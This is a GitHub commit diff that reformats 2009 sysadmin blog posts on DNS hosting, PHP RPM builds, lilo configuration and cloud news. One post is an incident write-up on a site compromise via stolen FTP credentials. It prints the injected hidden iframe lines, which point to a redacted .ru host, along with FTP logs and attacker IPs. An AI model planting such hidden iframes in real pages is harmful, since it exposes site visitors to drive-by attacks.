Permalink
Browse files

fix formatting for 2009(sept-dec) posts

  • Loading branch information...
gerold committed Jul 3, 2012
1 parent fc3361c commit 740d96baab2795703cb5be30e0bfdac5ba03547c
@@ -1,5 +1,6 @@
---
published: true
+comments: true
author: marius-ducea
date: '2009-09-01 05:03:36'
layout: post
@@ -15,22 +15,27 @@ categories:
The whole hidden IFRAME vulnerability has been going on for some time, only a few of our client have been effected by this. The net is still buzzing with this issue and while some are saying that the injection are results of php insecurities, mysql injection or cross site scripting, while others point to key loggers and hijacked ftp credentials. In our case the exploit was not due to an application vulnerability but rather to hijacked ftp login information. Brute force password guessing attacks were not performed on this account nor any other accounts on the same server. In this particular type of attack, at the very end of index.php/index.html an IFRAME statement was appended overwriting page closing tags.
-`iframe src="http://***.ru:8080/index.php" width=111 height=162 style="visibi
+```
+iframe src="http://***.ru:8080/index.php" width=111 height=162 style="visibi
iframe src="http://***.ru:8080/index.php" width=136 height=162 style="visibility: hidden" /iframe
-iframe src="http://***.ru:8080/index.php" width=141 height=156 style="visibility: hidden" /iframe`
+iframe src="http://***.ru:8080/index.php" width=141 height=156 style="visibility: hidden" /iframe
+```
Some of the index.php files had multiple IFRAME statements appended to the end. Knowing the username of affected account and affected filename I searched in /var/log/messages for any related entries and hit jackpot:
-`Aug 27 01:27:59 web152 pure-ftpd: (?@94.218.69.243) [INFO] user is now logged in
+```
+Aug 27 01:27:59 web152 pure-ftpd: (?@94.218.69.243) [INFO] user is now logged in
Aug 27 01:28:00 web152 pure-ftpd: (user@94.218.69.243) [NOTICE] /home/user//public_html/index.php downloaded (2311 bytes, 1001.70KB/sec)
Aug 27 01:28:00 web152 pure-ftpd: (user@94.218.69.243) [INFO] Logout.
Aug 27 01:28:04 web152 pure-ftpd: (?@78.92.144.185) [INFO] user is now logged in
Aug 27 01:28:05 web152 pure-ftpd: (user@78.92.144.185) [NOTICE] /home/user//public_html/index.php uploaded (2353 bytes, 10.42KB/sec)
-Aug 27 01:28:05 web152 pure-ftpd: (user@78.92.144.185) [INFO] Logout.`
+Aug 27 01:28:05 web152 pure-ftpd: (user@78.92.144.185) [INFO] Logout.
+```
What's interesting to note here is that even though downloading/uploading of index.php happens within a 6 second window, the source ip address for download and upload are not the same. During the next few days the same file is downloaded and uploaded but never from the same set of ip addresses. During the few days that I was allowing this to happen as I was monitoring said activity and collecting the IP addresses to see if a pattern emerges:
-`83.82.57.39 GeoIP Country Edition: NL, Netherlands
+```
+83.82.57.39 GeoIP Country Edition: NL, Netherlands
95.52.163.74 GeoIP Country Edition: RU, Russian Federation
189.122.164.40 GeoIP Country Edition: BR, Brazil
69.159.47.21 GeoIP Country Edition: CA, Canada
@@ -42,7 +47,8 @@ What's interesting to note here is that even though downloading/uploading of ind
190.198.3.27 GeoIP Country Edition: VE, Venezuela
75.208.130.92 GeoIP Country Edition: US, United States
68.84.202.157 GeoIP Country Edition: US, United States
-75.80.81.104 GeoIP Country Edition: US, United States`
+75.80.81.104 GeoIP Country Edition: US, United States
+```
Seeing that no clear pattern is evident here and considering that the IP address was different for each connection it is my rationale that the computer's at these IP addresses were a part of a botnet. My assumption is that a developer had saved the account password and was infected by malicious software which was able to gather the ftp credentials.
@@ -16,6 +16,6 @@ So a sys admin, an architect and a project manager walk into a bar... so I wish
The project manager was asking the system admin to explain what is more important and what brings more performance improvement - server memory or faster CPU.  The system admin was doing a great job providing a technical explanation when unexpectedly the architect stepped in and provided a beatiful explanation.
-"In terms of server performance, the CPU is like the stove, and memor is like the having more pots.  Both can increase performance in a unique way. "
+*In terms of server performance, the CPU is like the stove, and memor is like the having more pots.  Both can increase performance in a unique way.*
Think about it.  Is there a better analogy out there?
@@ -14,8 +14,6 @@ categories:
While we are very busy administering servers, looking at cloud computing developments and improving drupal performance, we sometimes get some time to take a break and catch up on the news.   Well, this isnt exactly news, as its been out since spring 2009, but you will need some time to watch this[ video on google wave](http://wave.google.com/help/wave/about.html#video).
-
-
This is definitely a game changer.  The folks who are behind this are the brothers who brought us google earth.
So while this does not have much to do with linux servers, it is open source, and it does run on Java.   There is tons of info about this product - I would urge you to also check out this good wiki article on[ google wave](http://en.wikipedia.org/wiki/Google_Wave).
@@ -15,48 +15,53 @@ categories:
A time comes when it makes more business sense to outsource DNS. While one can use a domain registrars to manage and host dns they do not always offer best performance or even offer SLA's. We will compare a couple of companies that specialize at DNS hosting only.
[DynDNS](http://www.dyndns.com/)
-- comprehensive services offerings
-- no downtimes since inception (2001)
-- worldwide DNS cluster
-- multiplatform dynamic update clients with excellent documentation
-- 29.95 per zone per year
-- web interface
-- SLA offerings options
-- Bind based architecture
+
+* comprehensive services offerings
+* no downtimes since inception (2001)
+* worldwide DNS cluster
+* multiplatform dynamic update clients with excellent documentation
+* 29.95 per zone per year
+* web interface
+* SLA offerings options
+* Bind based architecture
[easyDNS](http://www.easydns.com/)
-- unknown reliability
-- worldwide DNS cluster
-- multiplatform dynamic update clients
-- priced at $19.99 per zone per year
-- web interface
-- no SLA offering
-- Bind based architecture
+
+* unknown reliability
+* worldwide DNS cluster
+* multiplatform dynamic update clients
+* priced at $19.99 per zone per year
+* web interface
+* no SLA offering
+* Bind based architecture
[Nettica](http://www.nettica.com/)
-- unknown reliability
-- mostly US based DNS cluster (1 location in UK)
-- priced at $10 per zone per year
-- 100$ SLA offering
-- no linux update client, however dynamic ip updates can be done with curl call to their website
-- web interface
-- windows only API's
+
+* unknown reliability
+* mostly US based DNS cluster (1 location in UK)
+* priced at $10 per zone per year
+* 100$ SLA offering
+* no linux update client, however dynamic ip updates can be done with curl call to their website
+* web interface
+* windows only API's
[Zoneedit](http://zoneedit.com/)
-- Pioneer of hosted DNS
-- Bad recent reliability
-- Bind based architecture
-- mostly US based DNS cluster (1 location in Germany)
-- multiplatform dynamic update clients
-- wide range of dynamic update clients (java, python, perl, direct calls to their website with wget), clients hosted on sourceforge with limited documentation
-- host 5 domains for free, limited to 200meg query limit per domain(approx 1 million queries), additional options cost "zone credits @ $10.95 each" for services like additional domains, load balancing, monitoring, additional queries.
+
+* Pioneer of hosted DNS
+* Bad recent reliability
+* Bind based architecture
+* mostly US based DNS cluster (1 location in Germany)
+* multiplatform dynamic update clients
+* wide range of dynamic update clients (java, python, perl, direct calls to their website with wget), clients hosted on sourceforge with limited documentation
+* host 5 domains for free, limited to 200meg query limit per domain(approx 1 million queries), additional options cost "zone credits @ $10.95 each" for services like additional domains, load balancing, monitoring, additional queries.
[UltraDNS](http://www.ultradns.com)
-- Very comprehensive list of offerings
-- 15 worldwide nodes on 5 continents
-- Protection against DNS based DDOS
-- cross platform XML based API
-- web portal
-- 100% uptime SLA
-- directory based architecture, using Oracle database replication technology. Not based on BIND
-- $15 per month for 1 domain with 5 records and 5000 queries, overage costs are $1 per 1000 queries and 0.50 cents for per additional record.
+
+* Very comprehensive list of offerings
+* 15 worldwide nodes on 5 continents
+* Protection against DNS based DDOS
+* cross platform XML based API
+* web portal
+* 100% uptime SLA
+* directory based architecture, using Oracle database replication technology. Not based on BIND
+* $15 per month for 1 domain with 5 records and 5000 queries, overage costs are $1 per 1000 queries and 0.50 cents for per additional record.
@@ -20,21 +20,28 @@ tags:
Latest version of **PHP** available for RHEL5.x is 5.1.6 and no new RedHat releases are coming as packaging has ceased. You can get PHP 5.3 for RHEL5 from [Remi](http://blog.famillecollet.com/pages/Config-en), but it it's incompatible with latest versions of Drupal, Civicrm or many modules so we need the a 5.2X branch of PHP. This requires building php from source or using rpmbuild and source rpm. I was able to use [Koji's](http://kojipkgs.fedoraproject.org/packages/php/5.2.9/1.fc9/src/php-5.2.9-1.fc9.src.rpm) FC9 php5.2.9 src.rpm to rebuild for RHEL5 and here is how.
-
Install rpm-build package.
-`sudo yum install rpm-build`
+```
+sudo yum install rpm-build
+```
Create build env in your home directory (mine is called 'max'), do NOT build as root user. I used 'rpm' directory as the build location.
-`mkdir -p rpm/{SOURCES,SRPMS,SPECS,BUILD,RPMS}`
+```
+mkdir -p rpm/{SOURCES,SRPMS,SPECS,BUILD,RPMS}
+```
Create .rpmmacros file which will identify the build location.
-`echo "%_topdir /home/max/rpm" > .rpmmacros`
+```
+echo "%_topdir /home/max/rpm" > .rpmmacros
+```
Download php5.2.9 rpm source file, i used FC9 version as it is closest to RHEL5.
-`wget http://kojipkgs.fedoraproject.org/packages/php/5.2.9/1.fc9/src/php-5.2.9-1.fc9.src.rpm`
+```
+wget http://kojipkgs.fedoraproject.org/packages/php/5.2.9/1.fc9/src/php-5.2.9-1.fc9.src.rpm
+```
To rebuild php5.2.9 FC9 source RPM for RHEL5.x into binary RPM's we need to make sure build dependences have been satisfied. I created a file called "php-deps" which contains the build dependencies to be installed via YUM.
-`
+```
bzip2-devel
curl-devel
db4-devel
@@ -64,47 +71,60 @@ mhash-devel
ncurses-devel
libXpm-devel
libjpeg-devel
-`
+```
Install build dependencies via yum
-`sudo yum install -y `cat php-deps``
+```
+sudo yum install -y `cat php-deps`
+```
Finally perform the build, this could take some time depending on speed of your machine. If everything goes well many php*.rpm files will be created in rpm/RPMS/"arch-type"/ folder. "arch-type" is the hardware-platform of your machine which will match "uname -i" command (mine is i386)
-`rpmbuild --rebuild php-5.2.9-1.fc9.src.rpm`
+```
+rpmbuild --rebuild php-5.2.9-1.fc9.src.rpm
+```
-Now you can install the resulting RPM's manually but a better way is to create a local YUM repository.
-Install createrepo application via YUM.
-`sudo yum info createrepo`
+Now you can install the resulting RPM's manually but a better way is to create a local YUM repository. Install createrepo application via YUM.
+```
+sudo yum info createrepo
+```
Create a repository location directory and copy your newly generated php5.2.9 RPM files into it.
-`sudo mkdir /opt/local-repository && cp /home/max/rpm/RPMS/i386/* /opt/local-repository`
+```
+sudo mkdir /opt/local-repository && cp /home/max/rpm/RPMS/i386/* /opt/local-repository
+```
Initialize the local repository and catalog the files copied there. (run this command anytime you add/remove files from your local repository directory)
-`sudo createrepo /opt/local-repository/`
+```
+sudo createrepo /opt/local-repository/
+```
Configure your local repository with yum by creating a file in /etc/yum.repos.d called "local-repository.repo"
containing:
-`[local-repository]
+```
+[local-repository]
name=RHEL5 $releasever - Local Repo
baseurl=file:///opt/local-repository/
enabled=0
gpgcheck=0
#gpgkey=file:///path/to/you/RPM-GPG-KEY
-`
+```
Update yum to register local repository
-`sudo yum update`
+```
+sudo yum update
+```
Update php using your new rpm files via the local repository
-`sudo yum --enablerepo=local-repository update php`
+```
+sudo yum --enablerepo=local-repository update php
+```
Restart apache
-`sudo /etc/init.d/httpd restart`
+```
+sudo /etc/init.d/httpd restart
+```
Verify PHP version
-`php -v`
-
-
-
-
-
+```
+php -v
+```
@@ -22,15 +22,13 @@ Ok, we will start with this new section on our blog, the "SysAdmin Tool of the W
For our Sysadmin Tool of the Week it is [**Update Scout**](http://www.update-scout.com). This site notifies you for updates or new version of software. It contain hundreds (and increasing) of applications - linux, windows, mac, website apps and tools. Like in my case I monitor Wordpress, Drupal, Apache, MySQL, KeePass, Nagios and many other, so it's very helpful to just wait for an email to arrive rather than thinking about them, checking manually, or sign up to each of them.
**Get Started:**
-- signup: just add your email and password
-- select applications you want to monitor for updates
-- add your own application if it's not on the list
+* signup: just add your email and password
+* select applications you want to monitor for updates
+* add your own application if it's not on the list
**Site Features:**
-- Latest Updates, Latest Additions, Most Popular and Most Active sections
-- Browse list of monitored applications from A-Z or using tags
-- MyUpdate-Scout for list of your monitored applications
-
+* Latest Updates, Latest Additions, Most Popular and Most Active sections
+* Browse list of monitored applications from A-Z or using tags
+* MyUpdate-Scout for list of your monitored applications
Do you have similar or better tool than this? :)
-
@@ -14,8 +14,6 @@ categories:
See the [www.whitehouse.org](http://www.whitehouse.org) story at [TechPresident.com](http://techpresident.com/blog-entry/whitehousegov-goes-drupal), here is the excerpt:
-
> [WhiteHouse.gov](http://www.whitehouse.gov/) has gone Drupal. After months of planning, says an Obama Administration source, the White House has ditched the proprietary content management system that had been in place since the days of the Bush Administration in favor of the latest version of [the open-source Drupal software](http://drupal.org/), as the [AP](http://news.yahoo.com/s/ap/20091024/ap_on_go_pr_wh/us_obama_web_site_1) alluded to in its reporting several minutes ago.
-
![](http://techpresident.com/files/img_whitehouse_drupal.gif)
@@ -19,9 +19,9 @@ Amazon announced a couple of cool new things this morning. Standard and High CPU
Also Amazon entered it's [Relational Database Service](http://aws.amazon.com/rds/) into public beta. This new service makes it easy to set up, operate, and scale MySQL relational databases in the cloud via simple API calls.
- * Simple to Deploy - Quickly create a new production-ready relational database with a simple API call.
- * Managed - Amazon RDS handles generic, time-consuming database management tasks, such as patch management and backup.
- * Compatible - All of your existing MySQL database tools, applications, and drivers will still work.
- * Scalable - With a simple API call you can scale the compute and storage resources available to your database to meet your business needs and application load.
- * Reliable - Amazon RDS runs on the same highly reliable infrastructure used by other Amazon Web Services. Amazon RDS also gives you additional peace of mind by providing an automated database backup facility.
- * Inexpensive - You pay very low rates and only for the resources you actually consume. There are no long-term contracts or up-front commitments to use Amazon RDS.
+* Simple to Deploy - Quickly create a new production-ready relational database with a simple API call.
+* Managed - Amazon RDS handles generic, time-consuming database management tasks, such as patch management and backup.
+* Compatible - All of your existing MySQL database tools, applications, and drivers will still work.
+* Scalable - With a simple API call you can scale the compute and storage resources available to your database to meet your business needs and application load.
+* Reliable - Amazon RDS runs on the same highly reliable infrastructure used by other Amazon Web Services. Amazon RDS also gives you additional peace of mind by providing an automated database backup facility.
+* Inexpensive - You pay very low rates and only for the resources you actually consume. There are no long-term contracts or up-front commitments to use Amazon RDS.
@@ -18,38 +18,36 @@ tags:
---
Lately, we installed additional memory on our Debian (lenny) servers and installed 'bigmem' kernel for our 32-bit systems to recognize more than 3GB of ram. Bigmem kernel installations went fine on servers with Grub as their boot loader - most of them uses Grub. But on one machine with Lilo as boot loader, it didn't boot on bigmem kernel and below was the entry on _/etc/lilo.conf_.
+```
+# Boot up Linux by default.
+default=Linux
-`# Boot up Linux by default.
-default=Linux`
-
-`image=/vmlinuz
+image=/vmlinuz
label=Linux
read-only
# restricted
# alias=1
- initrd=/initrd.img`
+ initrd=/initrd.img
-`image=/vmlinuz.old
+image=/vmlinuz.old
label=LinuxOLD
read-only
optional
# restricted
# alias=2
- initrd=/initrd.img.old`
-
+ initrd=/initrd.img.old
+```
From this config I don't see the details of which kernel is the old one and the bigmem. I also tried to set the default to kernel with "LinuxOLD" label but it points to the same kernel (not the bigmem). I solved my problem by modifying the _/etc/lilo.conf_ config as follows:
-
-`# image=/vmlinuz
+```
+# image=/vmlinuz
**image=/boot/vmlinuz-2.6.26-2-686-bigmem
initrd=/boot/initrd.img-2.6.26-2-686-bigmem**
label=Linux
read-only
# restricted
# alias=1
#initrd=/initrd.img
-`
-
-**NOTE**: Don't forget to test first your changes on the _/etc/lilo.conf_ by running _'lilo'_ command - this will verify your changes.
-
+```
+**NOTE**: Don't forget to test first your changes on the `/etc/lilo.conf` by running `lilo` command - this will verify your changes.
Oops, something went wrong.

0 comments on commit 740d96b

Please sign in to comment.